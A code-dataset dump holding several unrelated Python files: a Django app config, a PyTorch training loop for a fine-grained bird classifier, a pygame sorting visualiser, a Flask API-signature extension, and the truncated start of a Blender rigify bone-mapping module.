content stringlengths 5 1.05M |
|---|
from django.apps import AppConfig
class CoursesappConfig(AppConfig):
    """Django application configuration for the ``coursesApp`` app."""
    name = 'coursesApp'
|
import torch,os
import torch.nn as nn
import torch.optim as optim
import tqdm
from torch.utils.data import DataLoader
from models import lrcm as lrcm
from datahandler import cubdataset as cubdataset
from utils import utils
from loss import custom_loss
import config
# Fix the RNG seeds at import time for reproducible training runs
# (CPU and the current CUDA device).
random_seed = 524626546435
torch.manual_seed(random_seed)
torch.cuda.manual_seed(random_seed)
def train_model():
    """
    Train the LRCM model on the CUB dataset.

    Builds the training pipeline (dataset/loader), the model, the losses,
    an SGD optimizer with warmup + cosine-annealed LR stepped per iteration,
    then runs the two-phase (coarse patch branch + fine whole-image branch)
    training loop, validating and checkpointing after every epoch.
    """
    # region Prepare
    # device.
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    train_set = cubdataset.CubDataset(
        config.DATA_ROOT,
        training = True,
        resize = config.RESIZE,
        crop = config.CROP,
        patch_num = [8,4,2],
    )
    train_loader = DataLoader(
        train_set,
        config.TRAIN_BATCH_SIZE,
        shuffle = True,
        num_workers = config.NUM_WORKERS,
        drop_last = True
    )
    # endregion
    # region Model
    # model.
    bb_name = "densenet161"
    model = lrcm.LRCM(
        bb_name = bb_name,
        backbone_pretrained_path = config.PRETRAINED_MODELS[bb_name],
        # channel widths of the three tapped densenet161 stages
        in_channels_list = [768,2112,2208],
        embedding_dim = 768,
        rlow_pool_size = [7,7,0],
        rmid_pool_size = [7,7,0],
        rhig_pool_size = [7,7,0],
        vlow_pool_size = [4,4,0],
        vmid_pool_size = [4,4,0],
        vhig_pool_size = [4,4,1],
        low_patch_num = 14 * 14,
        mid_patch_num = 7 * 7,
        hig_patch_num = 4 * 4,
        n_head = 8,
        reduced_dim = 768,
        atte_hidden_unit = 2048,
        dropout = 0.1,
        num_class = config.NUM_CLASS,
        pretrained_model_path = None,
    )
    model = model.to(device)
    print("============================================================================================================")
    print(model)
    print("============================================================================================================")
    # endregion
    # region Optim
    # criterion.
    cls_cri = nn.CrossEntropyLoss()
    fda_cri = custom_loss.FDALoss()
    # optimizer: the pretrained backbone stem trains with a 10x smaller LR.
    optimizer = optim.SGD([
        {'params': model.r_module.stem.parameters(), 'lr': config.LR * 0.1},
        {'params': model.r_module.apdx.parameters(), 'lr': config.LR},
        {'params': model.v_module.parameters(), 'lr': config.LR},
        {'params': model.c_module.parameters(), 'lr': config.LR}
    ], momentum = config.MOMENTUM,weight_decay = config.WD)
    # endregion
    # region Scheduler
    # lr: linear warmup for WARM_UP_EPOCH epochs, then cosine annealing,
    # both stepped once per iteration (hence the * epoch_iters scaling).
    epoch_iters = len(train_loader)
    lr_scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer,T_max = (config.TOTAL_EPOCH - config.WARM_UP_EPOCH) * epoch_iters,eta_min = 0)
    wrap_scheduler = utils.WarmupWrapper(optimizer,0,config.WARM_UP_EPOCH * epoch_iters,lr_scheduler)
    # endregion
    # region Run
    global_step = 0
    best_fine_epoch = 0
    best_valid_fine_acc = 0
    best_ens_epoch = 0
    best_valid_ens_acc = 0
    # dummy optimizer step before the first scheduler step (avoids the
    # PyTorch "scheduler.step() before optimizer.step()" warning).
    optimizer.zero_grad()
    optimizer.step()
    wrap_scheduler.step()
    for epoch in range(config.TOTAL_EPOCH):
        # statistics accumulated since the last RECORD_FREQ report ...
        batch_low_cls_loss = 0
        batch_mid_cls_loss = 0
        batch_hig_cls_loss = 0
        batch_coa_cls_loss = 0
        batch_com_cls_loss = 0
        batch_fda_loss = 0
        batch_low_acc = 0
        batch_mid_acc = 0
        batch_hig_acc = 0
        batch_coa_acc = 0
        batch_com_acc = 0
        # ... and over the whole epoch.
        epoch_low_acc_num = 0
        epoch_mid_acc_num = 0
        epoch_hig_acc_num = 0
        epoch_coa_acc_num = 0
        epoch_com_acc_num = 0
        epoch_train_num = 0
        model.train()
        for data in train_loader:
            global_step += 1
            # region Forward and Backward
            # data: original image plus three patch-shuffled scales and
            # their patch permutation indices.
            ori_img,low_img,mid_img,hig_img,low_patch_indices,mid_patch_indices,hig_patch_indices,targets = data
            low_indices = torch.stack(low_patch_indices,dim = 1).to(device)
            mid_indices = torch.stack(mid_patch_indices,dim = 1).to(device)
            hig_indices = torch.stack(hig_patch_indices,dim = 1).to(device)
            b = targets.size()[0]
            # region Coarse
            optimizer.zero_grad()
            # the four views are concatenated along the batch dimension;
            # each granularity head sees a different subset (4b/3b/2b rows).
            imgs = torch.cat((ori_img,hig_img,mid_img,low_img),dim = 0).to(device)
            low_logits,mid_logits,hig_logits,low_fda_output,mid_fda_output,hig_fda_output = model(
                imgs,
                low_indices,
                mid_indices,
                hig_indices,
                step = "coarse"
            )
            # cls: targets are tiled to match each head's batch multiple.
            low_targets = torch.cat((targets,targets,targets,targets),dim = 0).to(device)
            low_loss = cls_cri(low_logits,low_targets)
            mid_targets = torch.cat((targets,targets,targets),dim = 0).to(device)
            mid_loss = cls_cri(mid_logits,mid_targets)
            hig_targets = torch.cat((targets,targets),dim = 0).to(device)
            hig_loss = cls_cri(hig_logits,hig_targets)
            cls_loss = low_loss + mid_loss + hig_loss
            batch_low_cls_loss += low_loss.item()
            batch_mid_cls_loss += mid_loss.item()
            batch_hig_cls_loss += hig_loss.item()
            # fda: auxiliary loss, fixed weight 0.01.
            lambda_weights = 0.01
            fda_loss = lambda_weights * (fda_cri(low_fda_output) + fda_cri(mid_fda_output) + fda_cri(hig_fda_output))
            batch_fda_loss += fda_loss.item()
            loss = cls_loss + fda_loss
            loss.backward()
            optimizer.step()
            # evaluation
            total_logits = torch.cat((low_logits,mid_logits,hig_logits),dim = 0)
            total_probs = torch.softmax(total_logits,dim = -1)
            total_preds = torch.argmax(total_probs,dim = -1)
            low_preds,mid_preds,hig_preds = torch.split(total_preds,[b * 4,b * 3,b * 2],dim = 0)
            low_acc_num = torch.sum(low_preds == low_targets).item()
            mid_acc_num = torch.sum(mid_preds == mid_targets).item()
            hig_acc_num = torch.sum(hig_preds == hig_targets).item()
            # free the multi-scale batch before the fine pass
            del imgs,low_img,mid_img,hig_img
            # endregion
            # region Fine
            # second backward pass on the original image only.
            optimizer.zero_grad()
            ori_img = ori_img.to(device)
            coa_logits,com_logits = model(
                ori_img,
                step = "fine"
            )
            targets = targets.to(device)
            coa_loss = cls_cri(coa_logits, targets)
            com_loss = cls_cri(com_logits, targets)
            batch_coa_cls_loss += coa_loss.item()
            batch_com_cls_loss += com_loss.item()
            loss = coa_loss + com_loss
            loss.backward()
            optimizer.step()
            # LR scheduler advances once per iteration (after the fine step).
            wrap_scheduler.step()
            coa_probs = torch.softmax(coa_logits,dim = -1)
            com_probs = torch.softmax(com_logits,dim = -1)
            coa_preds = torch.argmax(coa_probs,dim = -1)
            com_preds = torch.argmax(com_probs,dim = -1)
            coa_acc_num = torch.sum(coa_preds == targets).item()
            com_acc_num = torch.sum(com_preds == targets).item()
            # endregion
            # endregion
            # statistic
            batch_low_acc += (low_acc_num / (b * 4))
            batch_mid_acc += (mid_acc_num / (b * 3))
            batch_hig_acc += (hig_acc_num / (b * 2))
            batch_coa_acc += (coa_acc_num / b)
            batch_com_acc += (com_acc_num / b)
            epoch_low_acc_num += low_acc_num
            epoch_mid_acc_num += mid_acc_num
            epoch_hig_acc_num += hig_acc_num
            epoch_coa_acc_num += coa_acc_num
            epoch_com_acc_num += com_acc_num
            epoch_train_num += b
            # display: report and reset running stats every RECORD_FREQ steps.
            if global_step % config.RECORD_FREQ == 0:
                avg_low_cls_loss = batch_low_cls_loss / config.RECORD_FREQ
                avg_mid_cls_loss = batch_mid_cls_loss / config.RECORD_FREQ
                avg_hig_cls_loss = batch_hig_cls_loss / config.RECORD_FREQ
                avg_coa_cls_loss = batch_coa_cls_loss / config.RECORD_FREQ
                avg_com_cls_loss = batch_com_cls_loss / config.RECORD_FREQ
                avg_fda_loss = batch_fda_loss / config.RECORD_FREQ
                avg_low_acc = batch_low_acc / config.RECORD_FREQ * 100
                avg_mid_acc = batch_mid_acc / config.RECORD_FREQ * 100
                avg_hig_acc = batch_hig_acc / config.RECORD_FREQ * 100
                avg_coa_acc = batch_coa_acc / config.RECORD_FREQ * 100
                avg_com_acc = batch_com_acc / config.RECORD_FREQ * 100
                print("E:%d-S:%d-[L:%.4f-M:%.4f-H:%.4f-CO:%.4f-CM:%.4f-F:%.4f]-[L:%.2f%%-M:%.2f%%-H:%.2f%%-CO:%.2f%%-CM:%.2f%%]" %
                    (
                        epoch,
                        global_step,
                        avg_low_cls_loss,
                        avg_mid_cls_loss,
                        avg_hig_cls_loss,
                        avg_coa_cls_loss,
                        avg_com_cls_loss,
                        avg_fda_loss,
                        avg_low_acc,
                        avg_mid_acc,
                        avg_hig_acc,
                        avg_coa_acc,
                        avg_com_acc
                    )
                )
                with open(config.RECORD_DIR + config.SAVE_MODEL_NAME + "-train.txt","a") as f:
                    f.write("E:%d-S:%d-[L:%.4f-M:%.4f-H:%.4f-CO:%.4f-CM:%.4f-F:%.4f]-[L:%.2f%%-M:%.2f%%-H:%.2f%%-CO:%.2f%%-CM:%.2f%%]\n" %
                        (
                            epoch,
                            global_step,
                            avg_low_cls_loss,
                            avg_mid_cls_loss,
                            avg_hig_cls_loss,
                            avg_coa_cls_loss,
                            avg_com_cls_loss,
                            avg_fda_loss,
                            avg_low_acc,
                            avg_mid_acc,
                            avg_hig_acc,
                            avg_coa_acc,
                            avg_com_acc
                        )
                    )
                batch_low_cls_loss = 0
                batch_mid_cls_loss = 0
                batch_hig_cls_loss = 0
                batch_coa_cls_loss = 0
                batch_com_cls_loss = 0
                batch_fda_loss = 0
                batch_low_acc = 0
                batch_mid_acc = 0
                batch_hig_acc = 0
                batch_coa_acc = 0
                batch_com_acc = 0
        # log: end-of-epoch validation; checkpoint on best fine / ensemble acc.
        low_cls_loss,mid_cls_loss,hig_cls_loss,coa_cls_loss,com_cls_loss,\
        low_acc,mid_acc,hig_acc,coa_acc,com_acc,fine_acc,ens_acc = valid_model(
            model,device,cls_cri
        )
        if fine_acc >= best_valid_fine_acc:
            best_valid_fine_acc = fine_acc
            best_fine_epoch = epoch
            saved_path = os.path.join(config.CHECKPOINT_SAVED_FOLDER,config.SAVE_MODEL_NAME+"-fine.pth")
            torch.save(model.state_dict(),saved_path,_use_new_zipfile_serialization = False)
        if ens_acc >= best_valid_ens_acc:
            best_valid_ens_acc = ens_acc
            best_ens_epoch = epoch
            saved_path = os.path.join(config.CHECKPOINT_SAVED_FOLDER,config.SAVE_MODEL_NAME+"-ens.pth")
            torch.save(model.state_dict(),saved_path,_use_new_zipfile_serialization = False)
        print("-" * 80)
        print("E:%d-S:%d-[L:%.4f-M:%.4f-H:%.4f-CO:%.4f-CM:%.4f]-[(Va)L:%.2f%%-M:%.2f%%-H:%.2f%%-CO:%.2f%%-CM:%.2f%%-ENS:%.2f%%]-[(Ta)L:%.2f%%-M:%.2f%%-H:%.2f%%-CO:%.2f%%-CM:%.2f%%]-[E:%d-Fine:%.2f%%]-[E:%d-ENS:%.2f%%]" %
            (
                epoch,
                global_step,
                low_cls_loss,
                mid_cls_loss,
                hig_cls_loss,
                coa_cls_loss,
                com_cls_loss,
                low_acc,
                mid_acc,
                hig_acc,
                coa_acc,
                com_acc,
                ens_acc,
                epoch_low_acc_num / (epoch_train_num * 4) * 100,
                epoch_mid_acc_num / (epoch_train_num * 3) * 100,
                epoch_hig_acc_num / (epoch_train_num * 2) * 100,
                epoch_coa_acc_num / epoch_train_num * 100,
                epoch_com_acc_num / epoch_train_num * 100,
                best_fine_epoch,
                best_valid_fine_acc,
                best_ens_epoch,
                best_valid_ens_acc,
            )
        )
        print("-" * 80)
        with open(config.RECORD_DIR + config.SAVE_MODEL_NAME + "-test.txt","a") as f:
            f.write("E:%d-S:%d-[L:%.4f-M:%.4f-H:%.4f-CO:%.4f-CM:%.4f]-[(Va)L:%.2f%%-M:%.2f%%-H:%.2f%%-CO:%.2f%%-CM:%.2f%%-ENS:%.2f%%]-[(Ta)L:%.2f%%-M:%.2f%%-H:%.2f%%-CO:%.2f%%-CM:%.2f%%]-[E:%d-Fine:%.2f%%]-[E:%d-ENS:%.2f%%]\n" %
                (
                    epoch,
                    global_step,
                    low_cls_loss,
                    mid_cls_loss,
                    hig_cls_loss,
                    coa_cls_loss,
                    com_cls_loss,
                    low_acc,
                    mid_acc,
                    hig_acc,
                    coa_acc,
                    com_acc,
                    ens_acc,
                    epoch_low_acc_num / (epoch_train_num * 4) * 100,
                    epoch_mid_acc_num / (epoch_train_num * 3) * 100,
                    epoch_hig_acc_num / (epoch_train_num * 2) * 100,
                    epoch_coa_acc_num / epoch_train_num * 100,
                    epoch_com_acc_num / epoch_train_num * 100,
                    best_fine_epoch,
                    best_valid_fine_acc,
                    best_ens_epoch,
                    best_valid_ens_acc,
                )
            )
    # endregion
def valid_model(model,device,cls_cri):
    """
    Validate (or test) the model on the CUB test split.

    Runs the full five-head forward pass on every test image (batch size 1),
    accumulates per-head losses and accuracies, plus two fused predictions:
    ``fine`` (coarse + common logits) and ``ens`` (all five heads summed).

    Returns, in order: the five mean losses (low/mid/hig/coa/com), then the
    seven accuracies in percent (low/mid/hig/coa/com/fine/ens).
    """
    # test datasets
    test_set = cubdataset.CubDataset(config.DATA_ROOT,training = False,resize = config.RESIZE,crop = config.CROP)
    test_loader = DataLoader(test_set,1,shuffle = False,num_workers = 1)
    # valid run: loss/accuracy accumulators.
    low_cls_loss = 0
    mid_cls_loss = 0
    hig_cls_loss = 0
    coa_cls_loss = 0
    com_cls_loss = 0
    low_acc = 0
    mid_acc = 0
    hig_acc = 0
    coa_acc = 0
    com_acc = 0
    fine_acc = 0
    ens_acc = 0
    # batch size is 1, so the number of batches equals the number of samples.
    total_num = len(test_loader)
    # change to eval mode.
    model.eval()
    with torch.no_grad():
        for data in tqdm.tqdm(test_loader,desc = "valid"):
            # data
            imgs,targets = data
            imgs = imgs.to(device)
            targets = targets.to(device)
            # forward
            low_logits,mid_logits,hig_logits,coa_logits,com_logits = model(imgs)
            low_loss,mid_loss,hig_loss,coa_loss,com_loss = \
                cls_cri(low_logits,targets),cls_cri(mid_logits,targets),\
                cls_cri(hig_logits,targets),cls_cri(coa_logits,targets),cls_cri(com_logits,targets)
            low_cls_loss += low_loss.item()
            mid_cls_loss += mid_loss.item()
            hig_cls_loss += hig_loss.item()
            coa_cls_loss += coa_loss.item()
            com_cls_loss += com_loss.item()
            # evaluation: argmax over each head plus the two logit fusions.
            b = targets.size()[0]
            fine_logits = coa_logits + com_logits
            ens_logits = low_logits + mid_logits + hig_logits + coa_logits + com_logits
            total_logits = torch.cat((low_logits,mid_logits,hig_logits,coa_logits,com_logits,fine_logits,ens_logits),dim = 0)
            total_probs = torch.softmax(total_logits,dim = -1)
            total_preds = torch.argmax(total_probs,dim = -1)
            low_preds,mid_preds,hig_preds,coa_preds,com_preds,fine_preds,ens_preds = torch.split(total_preds,[b,b,b,b,b,b,b],dim = 0)
            low_acc += torch.sum(low_preds == targets).item()
            mid_acc += torch.sum(mid_preds == targets).item()
            hig_acc += torch.sum(hig_preds == targets).item()
            coa_acc += torch.sum(coa_preds == targets).item()
            com_acc += torch.sum(com_preds == targets).item()
            fine_acc += torch.sum(fine_preds == targets).item()
            ens_acc += torch.sum(ens_preds == targets).item()
    return low_cls_loss/total_num,mid_cls_loss/total_num,hig_cls_loss/total_num,\
        coa_cls_loss/total_num,com_cls_loss/total_num,\
        low_acc/total_num * 100,mid_acc/total_num * 100,hig_acc/total_num * 100,\
        coa_acc/total_num * 100,com_acc/total_num * 100,fine_acc/total_num * 100,ens_acc/total_num * 100
if __name__ == "__main__":
    # Script entry point: run training directly.
    train_model()
import pygame
import time
pygame.font.init()
def outer(numbers,a):
    """
    Open a pygame window and repeatedly draw *numbers* as a bar chart.

    :param numbers: list of numeric values (may include negatives) to draw.
    :param a: collection of indices to highlight (drawn in lime instead of
        light green) — presumably the elements a sorting step is comparing;
        TODO confirm against the caller.

    NOTE(review): this function blocks forever in ``display_loop`` until the
    window is closed (pygame.QUIT), at which point it calls ``quit()``.
    """
    pygame.font.init()
    #color init
    black=(0,0,0)
    white=(255,255,255)
    dark_grey=(77,77,77)
    grey=(102,102,102)
    red=(255,0,0)
    lime=(51,255,51)
    light_green=(200,255,200)
    light_grey=(128,128,128)
    back=(199,209,199)
    #variable initialization
    display_height=750
    display_width=1000
    #display init
    screen = pygame.display.set_mode((display_width,display_height))
    pygame.display.set_caption('Sorting Algorithm')
    clock=pygame.time.Clock()
    def text_objects(text,font):
        # Render *text* and return the surface plus its bounding rect.
        textSurface = font.render(text, True, dark_grey)
        return textSurface, textSurface.get_rect()
    def bars(array,change):
        """Draw one frame of bars for *array*, highlighting indices in *change*."""
        n=len(array)
        big=max(array)
        small=min(array)
        r=big
        shift=0
        # with negative values, the drawable range spans |min| + max
        if small<0:
            r=abs(small)+big
        arry=[]
        # font size and label offset divisor `a` scale down as n grows
        # (this local `a` shadows outer's parameter).
        if n<20:
            a=1
            message_font=pygame.font.SysFont('arial.ttf',40)
        elif 19<n<50:
            a=2
            message_font=pygame.font.SysFont('arial.ttf',20)
        else:
            a=3
            message_font=pygame.font.SysFont('arial.ttf',15)
        try:
            ratio=(display_height-50)/r
        except ZeroDivisionError:
            ratio = 1
        # bar width and gap: proportional for n>6, fixed otherwise
        if n>6:
            w=(display_width/(n+(n+1)*0.2))
            w_gap=(w*0.2)
        else:
            w=100
            w_gap=60
        for i in array:
            arry.append(i*ratio)
        # shift everything up so negative bars stay on screen
        if small<0:
            ss=min(arry)
            shift=shift-ss+20
        for x in range(n):
            if x in change:
                pygame.draw.rect(screen,lime,[(w_gap*(x+1))+w*x,display_height-arry[x]-shift,w,arry[x]])
            else:
                pygame.draw.rect(screen,light_green,[(w_gap*(x+1))+w*x,display_height-arry[x]-shift,w,arry[x]])
            TextSurf , TextRect = text_objects(str(array[x]),message_font)
            # value label above positive bars, pinned near the axis for negatives
            if arry[x]>=0:
                TextRect.center=(((w_gap*(x+1))+w*x+w/2),(display_height-arry[x]-shift-20/a))
            if arry[x]<0:
                TextRect.center=(((w_gap*(x+1))+w*x+w/2),(display_height-(20/a)-shift))
            screen.blit(TextSurf,TextRect)
        pygame.display.update()
        return
    def display_loop():
        '''The loop governs the repeated display of updates in frames'''
        while True:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    pygame.quit()
                    quit()
            screen.fill(back)
            bars(numbers,a)
            pygame.display.update()
            clock.tick(60)
            time.sleep(0.1)
        # NOTE(review): unreachable — the while loop above never exits normally.
        return
    display_loop()
def exit():
    """
    Drain pending pygame events, then shut pygame down.

    NOTE(review): this shadows the builtin ``exit``; consider renaming at the
    call sites. The 1000-event cap looks like a guard against an unbounded
    event queue — confirm intent with the original author.
    """
    x=0
    for event in pygame.event.get():
        if event.type==pygame.QUIT:
            pygame.quit()
        x+=1
        if x>1000:
            break
    time.sleep(1)
    pygame.quit()
|
# -*- coding: utf-8 -*-
# @author: juforg
# @email: juforg@sina.com
# @date: 2020/04/06
# SJ编程规范
# 命名:
# 1. 见名思意,变量的名字必须准确反映它的含义和内容
# 2. 遵循当前语言的变量命名规则
# 3. 不要对不同使用目的的变量使用同一个变量名
# 4. 同个项目不要使用不同名称表述同个东西
# 5. 函数/方法 使用动词+名词组合,其它使用名词组合
# 设计原则:
# 1. KISS原则: Keep it simple and stupid !
# 2. SOLID原则: S: 单一职责 O: 开闭原则 L: 迪米特法则 I: 接口隔离原则 D: 依赖倒置原则
#
from flask import jsonify
from flask_api_sign.config import config
from flask_api_sign.exceptions import SignException, RequestExpiredError, NotConfigedAppIdsError, InvalidAppIdsTypeError, NotAllowedAppIdError, UnknowAppIdError
class ApiSignManager(object):
    """
    Flask extension that wires API request-signature verification into an app:
    registers default configuration values and the error handlers that turn
    signature failures into JSON responses.
    """

    def __init__(self, app=None):
        """
        Create the ApiSignManager instance. You can either pass a flask application
        in directly here to register this extension with the flask app, or
        call init_app after creating this object (in a factory pattern).
        :param app: A flask application
        """
        # Register this extension with the flask app now (if it is provided)
        if app is not None:
            self.init_app(app)

    def init_app(self, app):
        """
        Register this extension with the flask app.
        :param app: A flask application
        """
        # Save this so we can use it later in the extension
        if not hasattr(app, 'extensions'):  # pragma: no cover
            app.extensions = {}
        app.extensions['flask-api-sign'] = self
        # Set all the default configurations for this extension
        self._set_default_configuration_options(app)
        self._set_error_handler_callbacks(app)

    @staticmethod
    def _set_error_handler_callbacks(app):
        """
        Sets the error handler callbacks used by this extension.

        Fix: the two nested handlers previously shared the name
        ``handle_error`` (the second definition shadowed the first in the
        local scope); they are now distinctly named.
        """
        @app.errorhandler(RequestExpiredError)
        def handle_expired_error(e):
            # 408: the request timestamp fell outside the allowed window.
            return jsonify({config.error_msg_key: f'request timestamp expired:{e.args}'}), 408

        @app.errorhandler(SignException)
        def handle_sign_error(e):
            # 401: any other signature verification failure.
            return jsonify({config.error_msg_key: f'verification failed :{e.args}'}), 401

    @staticmethod
    def _set_default_configuration_options(app):
        """
        Sets the default configuration options used by this extension
        """
        # Where to look for the SIGN param.
        app.config.setdefault('SIGN_LOCATION', 'query_string')
        # Names of the signature-related request parameters/headers.
        app.config.setdefault('SIGN_TIMESTAMP_NAME', 'timestamp')
        app.config.setdefault('SIGN_APP_ID_NAME', 'x-app-id')
        app.config.setdefault('SIGN_SIGNATURE_NAME', 'x-sign')
        app.config.setdefault('SIGN_REQUEST_ID_NAME', 'x-request-id')
        app.config.setdefault('SIGN_ACCESS_TOKEN_NAME', 'x-access-token')
        app.config.setdefault('SIGN_APP_SECRET_NAME', 'app-secret')
        # How long a sign is valid (seconds).
        app.config.setdefault('SIGN_TIMESTAMP_EXPIRATION', 30)
        # What algorithm to use to sign . RSA SHA md5
        app.config.setdefault('SIGN_ALGORITHM', 'HS256')
        # Options for blacklisting/revoking tokens
        app.config.setdefault('SIGN_BLACKLIST_ENABLED', False)
        app.config.setdefault('SIGN_REQUIRE_SIGN', True)
        app.config.setdefault('SIGN_REQUIRE_TOKEN', False)
        app.config.setdefault('SIGN_ERROR_MSG_KEY', 'msg')

    @staticmethod
    def get_and_check_app_secret(app_id):
        """
        Look up the secret configured for *app_id*.

        Delegates to a custom checker if one is configured; otherwise reads
        the ``config.app_ids`` dict and raises a specific SignException
        subclass when the mapping is missing, malformed, or has no entry.
        :param app_id: caller application id
        :return: the matching app secret
        """
        if not config.cust_check_app_id_func:
            if not config.app_ids:
                raise NotConfigedAppIdsError("appid list not configed")
            if not isinstance(config.app_ids, dict):
                raise InvalidAppIdsTypeError("appid list not a dict")
            app_secret = config.app_ids.get(app_id)
            if not app_secret:
                raise UnknowAppIdError(f"unknow app_id:{app_id}")
            else:
                return app_secret
        else:
            return config.cust_check_app_id_func(app_id)
class ApiSign(object):
    """Container for the signature parameters extracted from one API request."""

    # Class-level defaults; every attribute is (re)assigned in __init__.
    app_id = None
    request_id = None
    signature = None
    timestamp = None
    # Fix: this was `dict()` — a single mutable dict shared by every instance
    # (and by the class itself), so in-place mutation on one request could
    # leak into others. None is a safe immutable default.
    other_params = None

    def __init__(self, app_id=None, request_id=None, signature=None, timestamp=None, other_params=None):
        """
        :param app_id: caller application id
        :param request_id: unique id of this request
        :param signature: the computed signature value
        :param timestamp: request timestamp used for expiry checking
        :param other_params: extra request parameters covered by the signature
        """
        self.app_id = app_id
        self.request_id = request_id
        self.signature = signature
        self.timestamp = timestamp
        self.other_params = other_params

    def dict(self):
        """Return the sign parameters as a dict keyed by the configured names;
        ``other_params`` is included only when non-empty."""
        d = {config.app_id: self.app_id,
             config.request_id: self.request_id,
             # config.data_key: self.other_params,
             config.timestamp: self.timestamp,
             }
        if self.other_params:
            d[config.data_key] = self.other_params
        return d
|
# Copyright (c) 2016-2020, Thomas Larsson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
"""
Abstract
Postprocessing of rigify rig
"""
import bpy
import os
from collections import OrderedDict
from bpy.props import *
from mathutils import Vector
from .error import *
from .utils import *
from .fix import Fixer, BendTwists
# Armature layer indices used for rigify bones
# (NOTE(review): presumed to match rigify's face/deform/helper layers — confirm).
R_FACE = 1
R_DEFORM = 29
R_HELP = 30
def setupTables(meta):
    """
    Populate the module-level bone-mapping tables for converting a DAZ rig
    to a rigify metarig, branching on the metarig generation (pre-Blender-2.78
    "rigify" vs newer "rigify2") and on the meta options DazUseSplitNeck /
    DazUseBreasts.

    Side effects: assigns all the globals declared below; in the new-style
    branch it also deletes the face bones above the head bone of *meta*.

    :param meta: the rigify metarig object (carries Daz* custom properties).
    :return: (rigtype, hips, head) — the rig flavour string and the metarig
        names of the hip and head bones.
    """
    global MetaBones, MetaParents, MetaDisconnect, RigifyParams
    global RigifySkeleton, GenesisCarpals, GenesisSpine
    global Genesis3Spine, Genesis3Mergers, Genesis3Parents
    global Genesis3Toes, Genesis3Renames
    global DeformBones
    if meta.DazPre278:
        # Old (pre-2.78) metarig: named spine bones.
        hips = "hips"
        spine = "spine"
        spine1 = "spine-1"
        chest = "chest"
        chest1 = "chest-1"
        neck = "neck"
        head = "head"
        rigtype = "rigify"
        # NOTE(review): here "spine" maps to spine, while the new-style branch
        # maps "spine" to hips — presumably intentional (different metarig
        # naming schemes), but worth confirming.
        MetaBones = {
            "spine" : spine,
            "spine-1" : spine1,
            "chest" : chest,
            "chest-1" : chest1,
            "chestUpper" : chest1,
            "neck" : neck,
            "head" : head,
        }
        RigifyParams = {}
        DeformBones = {
            "neckLower" : "DEF-neck",
            "neckUpper" : "DEF-neck",
            # %s placeholders take the side prefix ("L"/"R")
            "ShldrBend" : "DEF-upper_arm.01.%s",
            "ForearmBend" : "DEF-forearm.01.%s",
            "ThighBend" : "DEF-thigh.01.%s",
            "ShldrTwist" : "DEF-upper_arm.02.%s",
            "ForearmTwist" : "DEF-forearm.02.%s",
            "ThighTwist" : "DEF-thigh.02.%s",
            "Shin" : "DEF-shin.02.%s",
        }
    else:
        # New metarig: numbered spine chain (spine, spine.001, ...).
        hips = "spine"
        spine = "spine.001"
        spine1 = "spine.002"
        chest = "spine.003"
        chest1 = "spine.004"
        neck = "spine.005"
        if meta.DazUseSplitNeck:
            neck1= "spine.006"
            head = "spine.007"
        else:
            head = "spine.006"
        rigtype = "rigify2"
        # remove the metarig's face bones (children of the head bone)
        bpy.ops.object.mode_set(mode='EDIT')
        eb = meta.data.edit_bones[head]
        deleteChildren(eb, meta)
        bpy.ops.object.mode_set(mode='OBJECT')
        MetaBones = {
            "spine" : hips,
            "spine-1" : spine1,
            "chest" : chest,
            "chest-1" : chest1,
            "chestUpper" : chest1,
            "neck" : neck,
            "head" : head,
        }
        # NOTE(review): this is a SET of (bone, param, value) tuples, while
        # the pre-2.78 branch assigns an empty dict — confirm consumers
        # only iterate it.
        RigifyParams = {
            ("spine", "neck_pos", 6),
            ("spine", "pivot_pos", 1),
        }
        DeformBones = {
            "neckLower" : "DEF-spine.005",
            "neckUpper" : "DEF-spine.006",
            "ShldrBend" : "DEF-upper_arm.%s",
            "ForearmBend" : "DEF-forearm.%s",
            "ThighBend" : "DEF-thigh.%s",
            "ShldrTwist" : "DEF-upper_arm.%s.001",
            "ForearmTwist" : "DEF-forearm.%s.001",
            "ThighTwist" : "DEF-thigh.%s.001",
            "Shin" : "DEF-shin.%s.001",
        }
    # Bones whose connection to their parent must be broken.
    MetaDisconnect = [hips, neck]
    # Non-default parents in the metarig.
    MetaParents = {
        "breast.L" : chest,
        "breast.R" : chest,
        "shoulder.L" : chest1,
        "shoulder.R" : chest1,
    }
    # rigify bone name -> DAZ bone name (or (name, vgroup-list) tuple).
    RigifySkeleton = {
        hips : ("hip", ["hip", "pelvis"]),
        "thigh.L" : "lThigh",
        "shin.L" : "lShin",
        "foot.L" : "lFoot",
        "toe.L" : "lToe",
        "thigh.R" : "rThigh",
        "shin.R" : "rShin",
        "foot.R" : "rFoot",
        "toe.R" : "rToe",
        "abdomen" : "abdomen",
        "chest" : "chest",
        "neck" : "neck",
        "head" : "head",
        "shoulder.L" : "lCollar",
        "upper_arm.L" : "lShldr",
        "forearm.L" : "lForeArm",
        "hand.L" : "lHand",
        "shoulder.R" : "rCollar",
        "upper_arm.R" : "rShldr",
